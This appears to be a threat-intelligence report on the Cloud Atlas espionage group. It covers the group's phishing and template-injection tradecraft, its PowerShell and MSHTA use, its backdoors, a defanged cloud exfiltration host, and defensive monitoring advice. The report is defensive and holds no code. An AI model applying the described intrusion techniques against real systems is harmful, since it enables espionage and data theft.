Full Report
The experienced Cloud Atlas group remains active, continuing to target government sectors and diplomatic entities in Russia and Belarus, employing both new and established techniques to maintain persistence in compromised systems.
Analysis Summary
# Threat Actor: Cloud Atlas
## Attribution & Identity
Cloud Atlas (also known as **Inception**) is an experienced and sophisticated cyber-espionage group that has been active since at least 2014. While clear state attribution is not explicitly finalized in the public domain, their focus is consistently aligned with geopolitical intelligence gathering.
## Activity Summary
The group remains highly active, recently executing campaigns focused on maintaining long-term persistence within high-value networks. Their recent operations involve an evolution of their toolset, moving away from older, well-known backdoors toward more modular and elusive malware to bypass modern EDR and antivirus solutions. They have specifically updated their infection chains to include new techniques for initial access and lateral movement.
## Tactics, Techniques & Procedures
- **Spear-phishing:** Crafting highly tailored emails with malicious attachments (often .doc or .rtf) to gain initial entry.
- **Template Injection:** Utilizing remote template injection to download malicious payloads after the document is opened.
- **Living-off-the-Land (LotL):** Using legitimate system tools (like PowerShell and MSHTA) to execute code and avoid detection.
- **Scheduled Tasks:** Establishing persistence by creating scheduled tasks that trigger malware execution at specific intervals.
- **Multi-stage Payloads:** Deploying a complex chain of loaders to decrypt and execute the final backdoor in memory.
- **Polymorphic Code:** Shifting code structures to evade signature-based detection.
## Targeting
- **Sectors:** Government sectors, diplomatic entities, international organizations, and aerospace/research institutes.
- **Geography:** Primarily focused on **Russia** and **Belarus**, with historical targeting seen in Ukraine, Turkey, and other Eastern European or Central Asian countries.
- **Victims:** Foreign ministries, embassies, and government administrative offices.
## Tools & Infrastructure
- **Malware Families:**
- **PowerShower:** A PowerShell-based backdoor used for initial reconnaissance and environment tasking.
- **VBShower:** A VBScript-based downloader/backdoor.
- **Cloud Atlas Backdoor:** Their custom, modular C++ malware designed for file exfiltration and system command execution.
- **Infrastructure:**
- **C2:** Historically known for using legitimate cloud service providers (like OpenDrive) for Command and Control to blend in with normal traffic.
- **Defanged Hosts:** hxxps[://]opendrive[.]com (used for data exfiltration and tasking).
## Implications
Cloud Atlas represents a persistent and patient threat. Their ability to refine their TTPs over a decade suggests a high level of operational maturity. By targeting diplomatic and government entities in Russia and Belarus, they are likely engaged in high-level political espionage. Their shift toward "fileless" techniques and the use of legitimate cloud services makes them particularly difficult to detect for organizations lacking advanced behavioral monitoring.
## Mitigations
- **Email Security:** Implement advanced sandboxing and attachment filtering to catch remote template injection and malicious macros.
- **Endpoint Monitoring:** Deploy EDR solutions to monitor for suspicious PowerShell, `mshta.exe`, and `cmd.exe` activity, which are core to the actor's execution chain.
- **Cloud Traffic Analysis:** Monitor and audit traffic to public cloud storage providers; flag unusual or frequent data uploads from administrative workstations to services like OpenDrive.
- **Restrict Scripting:** Disable Macros and restrict PowerShell execution policies to "AllSigned" where possible to prevent unauthorized scripts from running.